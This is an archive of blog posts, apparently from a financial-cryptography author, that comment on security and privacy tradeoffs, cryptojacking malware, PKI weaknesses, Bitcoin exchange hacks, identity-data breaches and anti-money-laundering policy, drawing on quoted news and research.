January 26, 2020

Bayesian Security Compromise

Watching an argument (I started) (on the Internet) about Apple dropping iCloud encryption (allegedly) reminded me of how hard it is to get security & privacy right.

What had actually happened was that Apple had made it possible for you to back up securely to iCloud and leave a key there, so if you got locked out, Apple could help you get your access back. Usability to the fore!

But some were surprised at this - I know I was. So how do you get it your way? The details are complicated, take several pages and clearly most will not follow the instructions or get it how they want without help.

Keeping access to your own data is *important*! Keeping others out of your data is also important. And these two are in collision, tension, across the yellow diagonal above.

Strangely, it has a Bayesian feel to it - there is a strong link like that between the "false positives" and the "false negatives" such that if you dial one down, you actually dial the other up! Bayesian statistics tells you where on the compromise you are, and whether you've blown out the model by being too tight in one particular axis.

When you get to scale such that your user base includes people of all persuasions and security & privacy preferences, it might be that you're stuck in that compromise - you can save most of the people most of the time, so an awful lot depends on what the most of your users are like.

(Note the discord with there is only one mode, and it is secure.)

Posted by iang at 04:40 AM | Comments (0)

November 23, 2019

HTTPS reaches 80% - mission accomplished after 14 years

A post on Matthew Green's blog highlights that Snowden revelations helped the push for HTTPS everywhere.

Firefox also has a similar result, indicating a web-wide world result of 80%.

(It should be noted that google's decision to reward HTTPS users by prioritising it in search results probably helped more than anything, but before you jump for joy at this new-found love for security socialism, note that it isn't working too well in the fake news department.)

The significance of this is that back in around 2005 some of us first worked out that we had to move the entire web to HTTPS. Logic at the time was:

Why is this important? Why do we care about a small group of sites are still running SSL v2. Here's why - it feeds into phishing:
1. In order for browsers to talk to these sites, they still perform the SSL v2 Hello. 2. Which means they cannot talk the TLS hello. 3. Which means that servers like Apache cannot implement TLS features to operate multiple web sites securely through multiple certificates. 4. Which further means that the spread of TLS (a.k.a. SSL) is slowed down dramatically (only one protected site per IP number - schlock!), and 5, this finally means that anti-phishing efforts at the browser level haven't a leg to stand on when it comes to protecting 99% of the web.

Until *all* sites stop talking SSL v2, browsers will continue to talk SSL v2. Which means the anti-phishing features we have been building and promoting are somewhat held back because they don't so easily protect everything.

For the tl;dr: we can't protect the web when HTTP is possible. Having both HTTP and HTTPS as alternatives broke the rule: there is only one mode, and it is secure, and allowed attackers like phishers to just use HTTP and *pretend* it was secure.

The significance of this for me is that, from that point of time until now, we can show that a typical turn around the OODA loop (observe, orient, decide, act) of Information Security Combat took about 14 years. Albeit in the Internet protocol world, but that happens to be a big part of it.

During that time, a new bogeyman turned up - the NSA listening to everything - but that's ok. Decent security models should cover multiple threats, and we don't so much care which threat gets us to a comfortable position.

Posted by iang at 12:27 PM | Comments (0)

March 09, 2019

PKI certs are a joke, edition 2943

From the annals of web research:

A thriving marketplace for SSL and TLS certificates...exists on a hidden part of the Internet, according to new research by Georgia State University's Evidence-Based Cybersecurity Research Group (EBCS) and the University of Surrey. ....

When these certificates are sold on the darknet, they are packaged with a wide range of crimeware that delivers machine identities to cybercriminals who use them to spoof websites, eavesdrop on encrypted traffic, perform attacks and steal sensitive data, among other activities.

This is a direct consequence of certificate manufacturing, which is a direct consequence of the decision by browser vendors to downgrade the UX for security from essential to invisible.

I don't disagree with that last part as a strategy because as I wrote a long time ago, education is worse than useless. But the consequence of certificate manufacturing follows directly because if the certs can't be seen, they can't be valuable. And if they're not valuable, we need the lowest cost pipeline.

And lowest cost means zero. Which means they are confetti, and Let'sEncrypt has the right model. The unfortunate conclusion of this is that if certs are confetti we should not be selling them, we should be self-creating them. But the cartel got its death grip on the browser vendors, and so the unfortunate trade in pricey worthless certs continues.

This is all water under the bridge. But it is an interesting security question: how long will it take for the wider industry to strip out the broken model and replace it entirely? I vaguely recall that HTTPS2 adopted certificates, and as that is the hot new thing of the future, we'll probably need another two decades. Chance missed, let's all go long on phishing.

"One very interesting aspect of this research was seeing TLS certificates packaged with wrap-around services—such as Web design services—to give attackers immediate access to high levels of online credibility and trust," he said. "It was surprising to discover how easy and inexpensive it is to acquire extended validation certificates, along with all the documentation needed to create very credible shell companies without any verification information."

Yup, and surprisingly easy" extended validation for crooks is another consequence. Without a systemic approach to user security, it's doomed, and EV and other tricks are just fiddling around while Rome and her citizens burn.

Posted by iang at 02:58 PM | Comments (0)

January 29, 2019

How does the theory of terrorism stack up against AML? Badly - finally a case in Kenya: Dusit

Finally, an actual financial system & terrorism case lands before the courts, relating to the Dusit attack. Is this a world first? I don't know because this conjunction is so rare, nobody's tracking it.

The essential gripe is that since 9/11 the financial world decided to slap the terrorism label on their compliance process. Yet to no avail. Very few cases, so small that they fall between bayesian cracks. So misdirected because terrorists have options, and they can adjust their approach to slip under they radar. Backfiring because the terrorists are already outside norms and will do as much damage as needed, thus further harming the financial system.

And so hopeless because your true terrorist doesn't care about being caught afterwards - he's either dead or sacrificed.


Anyway, that's the theory - anti-terrorism applied to the financial system simply won't work. Let's see how the theory stacks against the evidence.

A suspect linked to the Dusit terror attack received Sh9 million from South Africa in three months and sent it to Somalia, the Anti-Terror Police Unit have said. Twenty one people, including a GSU officer, were killed in the January 15 attack. The cash was received through M-Pesa.

So far so good. We have about $90,000 (100 Kenya shillings is 1 USD) sent through M-Pesa, a mobile money system in Kenya, allegedly related to the Dusit attack.

Hassan Abdi Nur has 52 M-Pesa agent accounts. Fourty seven were registered between October and December last year, each with a SIM card. He used different IDs to register the SIM cards.

So (1), the theory of terrorism predicts that the money will be moved safely, whatever the cost. We have a match. In order to move the money, 52 accounts were opened, at the cost of different IDs.

One curiosity here is the cost. In my long running series on the Cost of your Identity Theft we see (or I suggest) an average cost of an Identity set of around $1000. Which would amount to a cost of $52k for 50 odd sets. But this is high for a washed amount of $90k.

Either the terrorists don't care of the cost, or cost of dodgy ID is lower in Kenya, or the alleged middleman amortised the cost over other deals. Interesting for further investigation but not germane to this case.

Then (2), the theory of bayesian statistics and the "base rate fallacy" predict that no terrorists will ever be caught before the fact based on AML/KYC controls.

Clearly this is a match - the evidence is being compiled from after-the-fact forensics. Now, in this the Kenyan authorities are to be applauded for coming out and actually revealing what's going on. In the western world, there is too much of a tendency to hide behind "national secrets" and thus render outside scrutiny, the democratic imperative, an impossibility. One up for the Kenyans, let's keep this investigation transparent and before the courts.

Next (3). The theory predicts that follow the money is a useless tool.

Ambitham was in constant communication with slain lead attacker Ali Salim Gichunge, who died during the attack and his spouse Violent Kemunto Omwoyo.

[Inspector] Githaiga yesterday said Ambitham’s phone led to his arrest on Tuesday after detectives established his communication with the Gichunges.

The police are following the social graph and arresting anyone involved. Having traced the phones, they then investigated the M-Pesa evidence, which provided many additional and interesting confirmatory facts.

Which is what they should do. But it was the contact information that cracked this case, not the financial flows. The contact information has always been available to them. And, where there is a credible case of terrorism as is in this case, the financial information has never been withheld. Again, the theory matches the evidence: follow the money is useless before the event, only confirmatory after the event.

Finally (4), the theory of unforeseen consequences says that the damage done by unintelligent responses will haunt the future of anti-terrorism efforts.

These are the agents that received the money, which was later withdrawn at the Diamond Trust Bank, Eastleigh branch, before it was wired to Somalia. ... The manager of the bank where Nur was withdrawing the money,, Sophia Mbogo, was arrested for failing to report Nur’s suspicious transactions. Nur is said to have made huge withdrawals in short intervals, which Mbogo ought to have reported to relevant authorities, but there is no indication she did so.

Without wishing to compromise the investigation - this looks inept. Eastleigh is the Somali district of Nairobi. It's a bustling centre of trade. In some respects the Somalis are better traders than the Kenyans, and a lot of trade is done. And a lot of that is in cash, because the Kenyan banking system is ... not responsive. Lots of legitimate cash would move in and out of that bank branch.

Given the alleged fact that the money man had 52 M-Pesa accounts, he was certainly aware enough to run under the radar of the branch. Thresholds and actions by banks are no secret, especially by those motivated by terrorism to conduct any crime to find out - bribery, extortion, kidnapping are options.

Maybe there is evidence that the branch or the manager is "in" on the deal. Or maybe there is not, and the Kenyan police have just confirmed the theory that FATF anti-terrorism will do more damage. They've sent a message to all branches to drown their customers in pointless compliance, and to not cooperate with the police.

The Kenyan police had better get a clear and undeniable conviction against the branch manager, or they are going to rue the day. The next terrorist attack will surely be harder.

Posted by iang at 01:33 AM | Comments (0)

January 11, 2019

Gresham's Law thesis is back - Malware bid to oust honest miners in Monero

7 years after we called the cancer that is criminal activity in Bitcoin-like cryptocurrencies, here comes a report that suggests that 4.3% of Monero mining is siphoned off by criminals.

A First Look at the Crypto-Mining Malware
Ecosystem: A Decade of Unrestricted Wealth

Sergio Pastrana
Universidad Carlos III de Madrid*
spastran@inf.uc3m.es
Guillermo Suarez-Tangil
King’s College London
guillermo.suarez-tangil@kcl.ac.uk

Abstract—Illicit crypto-mining leverages resources stolen from victims to mine cryptocurrencies on behalf of criminals. While recent works have analyzed one side of this threat, i.e.: web-browser cryptojacking, only white papers and commercial reports have partially covered binary-based crypto-mining malware. In this paper, we conduct the largest measurement of crypto-mining malware to date, analyzing approximately 4.4 million malware samples (1 million malicious miners), over a period of twelve years from 2007 to 2018. Our analysis pipeline applies both static and dynamic analysis to extract information from the samples, such as wallet identifiers and mining pools. Together with OSINT data, this information is used to group samples into campaigns.We then analyze publicly-available payments sent to the wallets from mining-pools as a reward for mining, and estimate profits for the different campaigns.Our profit analysis reveals campaigns with multimillion earnings, associating over 4.3% of Monero with illicit mining. We analyze the infrastructure related with the different campaigns,showing that a high proportion of this ecosystem is supported by underground economies such as Pay-Per-Install services. We also uncover novel techniques that allow criminals to run successful campaigns.

This is not the first time we've seen confirmation of the basic thesis in the paper Bitcoin & Gresham's Law - the economic inevitability of Collapse. Anecdotal accounts suggest that in the period of late 2011 and into 2012 there was a lot of criminal mining.

Our thesis was that criminal mining begets more, and eventually pushes out the honest business, of all form from mining to trade.

Testing the model: Mining is owned by Botnets

Let us examine the various points along an axis from honest to stolen mining: 0% botnet mining to 100% saturation. Firstly, at 0% of botnet penetration, the market operates as described above, profitably and honestly. Everyone is happy.

But at 0%, there exists an opportunity for near-free money. Following this opportunity, one operator enters the market by turning his botnet to mining. Let us assume that the operator is a smart and careful crook, and therefore sets his mining limit at some non-damaging minimum value such as 1% of total mining opportunity. At this trivial level of penetration, the botnet operator makes money safely and happily, and the rest of the Bitcoin economy will likely not notice.

However we can also predict with confidence that the market for botnets is competitive. As there is free entry in mining, an effective cartel of botnets is unlikely. Hence, another operator can and will enter the market. If a penetration level of 1% is non-damaging, 2% is only slightly less so, and probably nearly as profitable for the both of them as for one alone.

And, this remains the case for the third botnet, the fourth and more, because entry into the mining business is free, and there is no effective limit on dishonesty. Indeed, botnets are increasingly based on standard off-the-shelf software, so what is available to one operator is likely visible and available to them all.

What stopped it from happening in 2012 and onwards? Consensus is that ASICs killed the botnets. Because serious mining firms moved to using large custom rigs of ASICS, and as these were so much more powerful than any home computer, they effectively knocked the criminal botnets out of the market. Which the new paper acknowledged:

... due to the proliferation of ASIC mining, which uses dedicated hardware, mining Bitcoin with desktop computers is no longer profitable, and thus criminals’ attention has shifted to other cryptocurrencies.

Why is botnet mining back with Monero? Presumably because Monero uses an ASIC-resistant algorithm that is best served by GPUs. And is also a heavy privacy coin, which works nicely for honest people with privacy problems but also works well to hide criminal gains.

Posted by iang at 05:01 PM | Comments (11)

February 26, 2018

Epidemic of cryptojacking can be traced to escaped NSA superweapon

Boingboing writes on the connection between two of the themes often grumbled about in this blog: that Bitcoin muffed the incentives and encourages destructive and toxic behaviour, and that the NSA is the agency that as policy weakens our Internet.


The epidemic of cryptojacking malware isn't merely an outgrowth of the incentive created by the cryptocurrency bubble -- that's just the motive, and the all-important the means and opportunity were provided by the same leaked NSA superweapon that powered last year's Wannacry ransomware epidemic.

It all started when the Shadow Brokers dumped a collection of NSA cyberweapons that the NSA had fashioned from unreported bugs in commonly used software, including versions of Windows. The NSA discovered these bugs and then hoarded them, rather than warning the public and/or the manufacturers about them, in order to develop weapons that turned these bugs into attacks that could be used against the NSA's enemies.

This is only safe if neither rival states nor criminals ever independently rediscover the same bugs and use them to attack your country (they do, all the time), and if your stash of cyberweapons never leaks (oops).

Discovering the subtle bugs the NSA weaponized is sophisticated work that can only be performed by a small elite of researchers; but using these bugs is something that real dum-dums can do, as was evidenced by the hamfisted Wannacry epidemic.

Enter the cryptocurrency bubble: turning malware into money has always been tough. Ransomware criminals have to set up whole call-centers full of tech-support people who help their victims buy the cryptocurrency used to pay the ransom. But cryptojacking cuts out the middleman, stealing your computer to directly generate cash for the malware author. As long as cryptocurrencies continue to inflate, this is a great racket.

Wannamine is a cryptojacker that uses Eternalblue, the same NSA exploit as Wannacry. It's been around since last October, and it's on the rise, extracting Monero from victims' computers.

What's more, it's a cryptojacker written by a dum-dum, and it is so incontinent that slows down critical computers to the point of useless, shutting down important IT infrastructure.

WannaMine doesn’t resort to EternalBlue on its first try, though. First, WannaMine uses a tool called Mimikatz to pull logins and passwords from a computer’s memory. If that fails, Wannamine will use EternalBlue to break in. If this computer is part of a local network, like at a company office, it will use these stolen credentials to infect other computers on the network.

The use of Mimikatz in addition to EternalBlue is important “because it means a fully patched system could still be infected with WannaMine,” York said. Even if your computer is protected against EternalBlue, then, WannaMine can still steal your login passwords with Mimikatz in order to spread.

Cryptocurrency Mining Malware That Uses an NSA Exploit Is On the Rise [Daniel Oberhaus/Motherboard]

Posted by iang at 05:43 PM | Comments (4)

February 20, 2018

Tesla’s cloud was used by hackers to mine cryptocurrency

Just because I get the photo op, here's The Verge on Tesla's operations being cryptojacked.

Tesla’s cloud account was hacked and used to mine cryptocurrency, according to a security research firm. Hackers gained access to the electric car company’s Amazon cloud account, where they were able to view “sensitive data” such as vehicle telemetry.

...

According to RedLock, using Tesla’s cloud account to mine cryptocurrency is more valuable than any data stored within. The cybersecurity firm said in a report released Monday that it estimates 58 percent of organizations that use public cloud services, such as AWS, Microsoft Azure, or Google Cloud, have publicly exposed “at least one cloud storage service.” Eight percent have had cryptojacking incidents.

“The recent rise of cryptocurrencies is making it far more lucrative for cybercriminals to steal organizations’ compute power rather than their data,” RedLock CTO Gaurav Kumar told Gizmodo. “In particular, organizations’ public cloud environments are ideal targets due to the lack of effective cloud threat defense programs. In the past few months alone, we have uncovered a number of cryptojacking incidents including the one affecting Tesla.”

Posted by iang at 03:51 PM | Comments (4)

January 04, 2018

Hackers selling access to Aadhar

TRIBUNE INVESTIGATION — SECURITY BREACH
Rs 500, 10 minutes, and you have access to billion Aadhaar details
Group tapping UIDAI data may have sold access to 1 lakh service providers

Rachna Khaira
Tribune News Service
Jalandhar, January 3

It was only last November that the UIDAI asserted that “Aadhaar data is fully safe and secure and there has been no data leak or breach at UIDAI.” Today, The Tribune “purchased” a service being offered by anonymous sellers over WhatsApp that provided unrestricted access to details for any of the more than 1 billion Aadhaar numbers created in India thus far.

It took just Rs 500, paid through Paytm, and 10 minutes in which an “agent” of the group running the racket created a “gateway” for this correspondent and gave a login ID and password. Lo and behold, you could enter any Aadhaar number in the portal, and instantly get all particulars that an individual may have submitted to the UIDAI (Unique Identification Authority of India), including name, address, postal code (PIN), photo, phone number and email.

What is more, The Tribune team paid another Rs 300, for which the agent provided “software” that could facilitate the printing of the Aadhaar card after entering the Aadhaar number of any individual.

When contacted, UIDAI officials in Chandigarh expressed shock over the full data being accessed, and admitted it seemed to be a major national security breach. They immediately took up the matter with the UIDAI technical consultants in Bangaluru.

Sanjay Jindal, Additional Director-General, UIDAI Regional Centre, Chandigarh, accepting that this was a lapse, told The Tribune: “Except the Director-General and I, no third person in Punjab should have a login access to our official portal. Anyone else having access is illegal, and is a major national security breach.”

...
read more.

Posted by iang at 02:32 PM | Comments (0)

June 16, 2017

Identifying as an artist - using artistic tools to generate your photo for your ID

Copied without comment:

Artist says he used a computer-generated photo for his official ID card

A French artist says he fooled the government by using a computer-generated photo for his national ID card.

Raphael Fabre posted on his website and Facebook what he says are the results of his computer modeling skills on an official French national ID card that he applied for back in April.


Le 7 avril 2017, j’ai fait une demande de carte d’identité à la mairie du 18e. Tous les papiers demandés pour la carte étaient légaux et authentiques, la demande a été acceptée et j’ai aujourd’hui ma nouvelle carte d’identité française.

La photo que j’ai soumise pour cette demande est un modèle 3D réalisé sur ordinateur, à l’aide de plusieurs logiciels différents et des techniques utilisées pour les effets spéciaux au cinéma et dans l’industrie du jeu vidéo. C’est une image numérique, où le corps est absent, le résultat de procédés artificiels.

L’image correspond aux demandes officielles de la carte : elle est ressemblante, elle est récente, et répond à tous les critères de cadrage, lumière, fond et contrastes à observer.

Le document validant mon identité le plus officiellement présente donc aujourd’hui une image de moi qui est pratiquement virtuelle, une version de jeu vidéo, de fiction.
Le portrait, la planche photomaton et le récépissé de demande ont été montrés à la Galerie R-2 pour l'Exposition Agora

On April 7, 2017, I made a request for identity card at the city hall of the 18th. All the papers requested for the card were legal and authentic, the request was accepted and I now have my new French Identity Card.

The Photo I submitted for this request is a 3 D model on computer, using several different software and techniques used for special effects in cinema and in the video game industry. This is a digital image, where the body is absent, the result of artificial processes.

The image corresponds to the official requests of the card: it is similar, it is recent, and meets all the criteria for framing, light, background and contrast to be observed.

The document validating my most official identity is now an image of me that is practically virtual, a video game version, fiction.

The Portrait, the photo booth and the request receipt were shown at the r-2 Gallery for the Exposition Agora

The image is 100 percent artificial, he says, made with special-effects software usually used for films and video games. Even the top of his body and clothes are computer-generated, he wrote (in French) on his website.

But it worked, he says. He followed guidelines for photos and made sure the framing, lighting, and size were up to government standards for an ID. And voila: He now has what he says is a real ID card with a CGI picture of himself.

"Absolutely everything is retouched, modified, and idealized"
He told Mashable France that the project was spurred by his interest in discerning what's artificial and real in the digital age. "What interests me is the relationship that one has to the body and the image ... absolutely everything is retouched, modified, and idealized. How do we see the body and identity today?" he said.

In an email, he said that the French government isn't aware yet of his project that just went up on Facebook earlier this week, but "it is bound to happen."

Before he received the ID, the CGI portrait and his application were on display at an Agora exhibit in Paris through the beginning of May.

Now, if the ID is real, it looks like his art was impressive enough to fool the French government.

Posted by iang at 05:21 AM | Comments (16)

February 19, 2017

N Reasons why Searching Electronic Devices makes Everyone Unsafe.

The current practice of searching electronic devices makes everyone less safe. Here's several reasons.

1. People's devices will often include their login parameters to online banking or <shudder> digital cash accounts such as Bitcoin. The presence of all this juicy bank account and digital cash information is going to corrupt the people doing the searching work, turning them to seizure.

In the age when security services might detain you until you decrypt your hard drive, or border guards might threaten to deny you entry until you reveal your phone’s PIN, it is only a matter of time before the state authorities discover what Bitcoin hardware wallets are (maybe they did already). When they do, what can stop them from forcing you to unlock and reveal your wallet?

I'm not saying may, I'm saying will. And before you say "oh, but our staff are honest and resistant to corruption," let me say this: you're probably wrong and you just don't know it. Most countries, including the ones currently experimenting with searching techniques, have corruption in them, the only thing that varies is the degree and location.

As we know from the war on drugs, the corruption is pretty much aligned positively with the value that is at risk. As border guards start delving into traveller's electronic devices in the constitution-free zone of the border, they're opened up the traveller's material and disposable wealth. This isn't going to end well.

2. As a response to corruption and/or perceived corruption from the ability for authorities and persons to now see and seize these funds, users or travellers will move away from the safer electronic funding systems to less safe alternates. In the extreme, cash but also consider this a clear signal to use Bitcoin, folks. People used to dealing with online methods of storing value will explore alternates. No matter what we think about banks, they are mostly safer than alternates, at least in the OECD, so this will reduce overall safety.

3. Anyone who actually intends to harm your homeland already knows what you are up to. So, they'll just avoid it. The easy way is to not carry any electronic devices across the border. They'll pick up new devices as they're driving off from the airport.

4. Boom - the entire technique of searching electronic devices is now spent on generating false positives, which are positive hits on the electronic devices of innocent travellers who want to travel not hurt. Which all brings harm to everyone except the bad guys who will be left free because there is nothing to search.

5. This is the slight flaw in my argument that everyone will be less safe: the terrorists will be safer, because they won't be being searched. But, as they intend to harm, their level of safety is very low in the long run.

6. Which will lead to border guards accusing travellers without electronics of being suspicious jihadists. Which will lead real jihadists to start carrying burner phones pre-loaded with 'legends' being personas created for the purpose of tricking border guards.

And, yes, before you ask: it's easier for bad folk to create a convincing legend than it is to spot a legend in the crush of the airport queue.

7. The security industry is already - after only 2 weeks of this crazy policy - talking about how to hide personal data from a device search.

Some of these techniques of hiding the true worth will work. OK, that's the individual's right.

8. Note how you've made the security industry your enemy. I'm not sure how this works to the benefit of anyone, but it is going to make it harder for you to get quality advice in the future.

9. Some of the techniques won't work, leading to discovery, and a presumption that a traveller has something to hide. Therefore /guilty by privacy/ will be branded on innocent people, resulting in more cost to everyone.

10. All of the techniques will lead to an arms race as border guards have to develop newer and better understanding of each dark space in each electronic device, and we the people will have to hunt around for easy dark spaces. When we could all be doing something useful.

11. All of the techniques, working or not, will lower usability and therefore result in less overall security to the user. This is called Kerchkhoffs' 6th principle of security: if the device is too hard to use, it won't be used at all, achieving zero security.

The notion that searching electronic devices could make anyone safer is based on the likelihood of a freak of accident. That is, the chance that some idiotterrorjihadist doesn't follow the instructions from on-high, and actually carries a device on a plane with some real intel on it.

This is a forgettable chance. Someone who is so dumb as to fly on a plane, carrying the plans to blow up the airport on his phone, is unlikely to get out of the bath without slipping and breaking his neck. This is not a suitable operative to deal with the intricacies of some evil plot. Terrorists will know this; they're evil but they are not stupid. They will not let someone so stupid as to carry infringing material onto the plane.

There is zero upside in this tactic. The homeland security people who have been searching electronic devices have summarily destroyed a valuable targetted technique. They have increased harm and damages to everyone, except the people who they think they are chasing, which of course increases the harm to everyone.

Posted by iang at 01:35 PM | Comments (1)

October 23, 2016

Bitfinex - Wolves and a sheep voting on what's for dinner

When Bitcoin first started up, although I have to say I admired the solution in an academic sense, I had two critiques. One is that PoW is not really a sustainable approach. Yes, I buy the argument that you have to pay for security, and it worked so it must be right. But that's only in a narrow sense - there's also an ecosystem approach to think about.

Which brings us to the second critique. The Bitcoin community has typically focussed on security of the chain, and less so on the security of the individual. There aren't easy tools to protect the user's value. There is excess of focus on technologically elegant inventions such as multisig, HD, cold storage, 51% attacks and the like, but there isn't much or enough focus in how the user survives in that desperate world.

Instead, there's a lot of blame the victim, saying they should have done X, or Y or used our favourite toy or this exchange not that one. Blaming the victim isn't security, it's cannibalism.


Unfortunately, you don't get out of this for free. If the Bitcoin community doesn't move to protect the user, two things will happen. Firstly, Bitcoin will earn a dirty reputation, so the community won't be able to move to the mainstream. E.g., all these people talking about banks using Bitcoin - fantasy. Moms and pops will be and remain safer with money in the bank, and that's a scary thought if you actually read the news.

Secondly, and worse, the system remains vulnerable to collapse. Let's say someone hacks Mt.Gox and makes a lot of money. They've now got a lot of money to invest in the next hack and the next and the next. And then we get to the present day:

Message to the individual responsible for the Bitfinex security incident of August 2, 2016

We would like to have the opportunity to securely communicate with you. It might be possible to reach a mutually agreeable arrangement in exchange for an enormous bug bounty (payable through a more privacy-centric and anonymous way).


So it turns out a hacker took a big lump of Bitfinex's funds. However, the hacker didn't take it all. Joseph VaughnPerling tells me:

"The bitfinex hack took just about exactly what bitfinex had in cold storage as business profit capital. Bitfinex could have immediately made all customers whole, but then would have left insufficient working capital. The hack was executed to do the maximal damage without hurting the ecosystem by putting bitfinex out of business. They were sure to still be around to be hacked again later.

It is like a good farmer, you don't cut down the tree to get the apples."

A carefully calculated amount, coincidentally about the same as Bitfinex's working capital! This is annoyingly smart of the hacker - the parasite doesn't want to kill the host. The hacker just wants enough to keep the company in business until the next mafiosa-style protection invoice is due.

So how does the company respond? By realising that it is owned. Pwn'd the cool kids say. But owned. Which means a negotiation is due, and better to convert the hacker into a more responsible shareholder or partner than to just had over the company funds, because there has to be some left over to keep the business running. The hacker is incentivised to back off and just take a little, and the company is incentivised to roll over and let the bigger dog be boss dog.

Everyone wins - in terms of game theory and economics, this is a stable solution. Although customers would have trouble describing this as a win for them, we're looking at it from an ecosystem approach - parasite versus host.

But, that stability only survives if there is precisely one hacker. What happens if there are two hackers? What happens when two hackers stare at the victim and each other?

Well, it's pretty easy to see that two attackers won't agree to divide the spoils. If the first one in takes an amount calculated to keep the host alive, and then the next hacker does the same, the host will die. Even if two hackers could convert themselves into one cartel and split the profits, a third or fourth or Nth hacker breaks the cartel.

The hackers don't even have to vote on this - like the old joke about democracy, when there are 2 wolves and 1 sheep, they eat the sheep immediately. The talk about voting is just the funny part for human consumption. Pardon the pun.

The only stability that exists in the market is if there is between zero and one attacker. So, barring the emergence of some new consensus protocol to turn all the individual attackers into one global mafiosa guild, a theme frequently celebrated in the James Bond movies, this market cannot survive.


To survive in the long run, the Bitcoin community have to do better than the banks - much better. If the Bitcoin community wants a future, they have to change course. They have to stop obsessing about the chain's security and start obsessing about the user's security.

The mantra should be, nobody loses money. If you want users, that's where you have to set the bar - nobody loses money. On the other hand, if you want to build an ecosystem of gamblers, speculators and hackers, by all means, obsess about consensus algorithms, multisig and cold storage.


ps; I first made this argument of ecosystem instability in "Bitcoin & Gresham's Law - the economic inevitability of Collapse," co-authored with Philipp Güring.

Posted by iang at 12:35 PM | Comments (0)

March 27, 2016

OODA loop of breach patching - Adobe

My measurement of the OODA loop length for the renegotiation bug in SSL was a convenient device to show where we are failing. The OODA loop is famous in military circles for the notion that if your attacker circles faster than you, he wins. Recently, Tudor Dumitras wrote:

To understand security threats, and our ability to defend against them, an important question is "Can we patch vulnerabilities faster than attackers can exploit them?" (to quote Bruce Schneier). When asking this question, people usually think about creating patches for known vulnerabilities before exploits can be developed or discovering vulnerabilities before they can be targeted in zero-day attacks. However, another race may have an even bigger impact on security: once a patch is released, is must also be deployed on all the hosts running the vulnerable software before the vulnerability is exploited in the wild. ....

For example, CVE-2011-0611 affected both the Adobe Flash Player and Adobe Reader (Reader includes a library for playing .swf objects embedded in a PDF). Because updates for the two products were distributed using different channels, the vulnerable host population decreased at different rates, as illustrated in the figure on the left. For Reader patching started 9 days after disclosure (after patch for CVE-2011-0611 was bundled with another patch in a new Reader release), and the update reached 50% of the vulnerable hosts after 152 days. For Flash patching started earlier, 3 days after disclosure, but the patching rate soon dropped (a second patching wave, suggested by the inflection in the curve after 43 days, eventually subsided as well). Perhaps for this reason, CVE-2011-0611 was frequently targeted by exploits in 2011, using both the .swf and PDF vectors.


My comments - it is good to see the meme spreading. I first started talking about how updates are an essential toolkit back in the mid 2000s, as a consequence of my 7 scrappy hypotheses. I've recently spotted the Security folk in IETF starting to talk about it, and the Bitcoin hardfork debate has thrown upgradeability into stark relief. Also, the clear capabilities from Apple to push out updates, the less clear but not awful work by Microsoft in patching, and the disaster that is Android have made it clear:

The future of security includes a requirement to do dynamic updating.

Saying it is harder than doing it, but that's why we're in the security biz.

Posted by iang at 07:32 PM | Comments (0)

October 25, 2015

When the security community eats its own...

If you've ever wondered what that Market for Silver Bullets paper was about, here's Pete Herzog with the easy version:

When the Security Community Eats Its Own

BY PETE HERZOG
http://isecom.org

The CEO of a Major Corp. asks the CISO if the new exploit discovered in the wild, Shizzam, could affect their production systems. He said he didn't think so, but just to be sure he said they will analyze all the systems for the vulnerability.

So his staff is told to drop everything, learn all they can about this new exploit and analyze all systems for vulnerabilities. They go through logs, run scans with FOSS tools, and even buy a Shizzam plugin from their vendor for their AV scanner. They find nothing.

A day later the CEO comes and tells him that the news says Shizzam likely is affecting their systems. So the CISO goes back to his staff to have them analyze it all over again. And again they tell him they don’t find anything.

Again the CEO calls him and says he’s seeing now in the news that his company certainly has some kind of cybersecurity problem.

So, now the CISO panics and brings on a whole incident response team from a major security consultancy to go through each and every system with great care. But after hundreds of man hours spent doing the same things they themselves did, they find nothing.

He contacts the CEO and tells him the good news. But the CEO tells him that he just got a call from a journalist looking to confirm that they’ve been hacked. The CISO starts freaking out.

The CISO tells his security guys to prepare for a full security upgrade. He pushes the CIO to authorize an emergency budget to buy more firewalls and secondary intrusion detection systems. The CEO pushes the budget to the board who approves the budget in record time. And almost immediately the equipment starts arriving. The team works through the nights to get it all in place.

The CEO calls the CISO on his mobile – rarely a good sign. He tells the CISO that the NY Times just published that their company allegedly is getting hacked Sony-style.

They point to the newly discovered exploit as the likely cause. They point to blogs discussing the horrors the new exploit could cause, and what it means for the rest of the smaller companies out there who can’t defend themselves with the same financial alacrity as Major Corp.

The CEO tells the CISO that it's time they bring in the FBI. So he needs him to come explain himself and the situation to the board that evening.

The CISO feels sick to his stomach. He goes through the weeks of reports, findings, and security upgrades. Hundreds of thousands spent and - nothing! There's NOTHING to indicate a hack or even a problem from this exploit.

So wondering if he’s misunderstood Shizzam and how it could have caused this, he decides to reach out to the security community. He makes a new Twitter account so people don’t know who he is. He jumps into the trending #MajorCorpFail stream and tweets, "How bad is the Major Corp hack anyway?"

A few seconds later a penetration tester replies, "Nobody knows xactly but it’s really bad b/c vendors and consultants say that Major Corp has been throwing money at it for weeks."

Read on for the more deeper analysis.

Posted by iang at 06:04 AM | Comments (0)

April 03, 2015

Training Day 2: starring Bridges & Force

Readers might have probably been watching the amazing story of the Bridges & Force arrests in USA. It's starting to look much like a film, and the one I have in mind is this: Training Day.

In short: two agents were sent in to bring down the Silk Road website for selling anything (guns, drugs, etc). In the process, the agents stole a lot of the money. And in the process, went on a rampage through the Bitcoin economy robbing, extorting, and manipulating their way to riches.

You can't make this up. Worse, we don't need to. The problem is deep, underlying and demented within our society. We're going to see much more of it, and the reason we know this is that we have decades of experience in other countries outside the OECD purview.

This is our own actions coming back to destroy us. In a nutshell here it is, here is the short story that gets me on the FATF's blacklist and you too if you spread it:

In the 1980s, certain European governments got upset about certain forms of arbitrage across nations by multinationals and rich folk. These people found a ready consensus with others in policing work who said that "follow the money" was how you catch the really bad people, a.k.a. criminals. Between these two groups of public servants they felt they could crack open the bank secrecy that was protecting criminals and rich people alike.

So the Anti Money Laundering or AML project was born, under the aegis of FATF or financial action task force, an office created in Paris under OECD. Their concept was that they put together rules about how to stop bad money moving through the system. In short: know your customer, and make sure their funds were good. Add in risk management and suspicious activity reporting and you're golden.

On passing these laws, every politician faithfully promised it was only for the big stuff, drugs and terrorism, and would never be used against honest or wealthy or innocent people. Honest Injun!

If only so simple. Anyone who knows anything about crime or wealth realises within seconds that this is not going to achieve anything against the criminals or the wealthy. Indeed, it may even make matters worse, because (a) the system is too imperfect to be anything but noise, (b) criminals and wealthy can bypass the system, and (c) criminals can pay for access. Hold onto that thought.

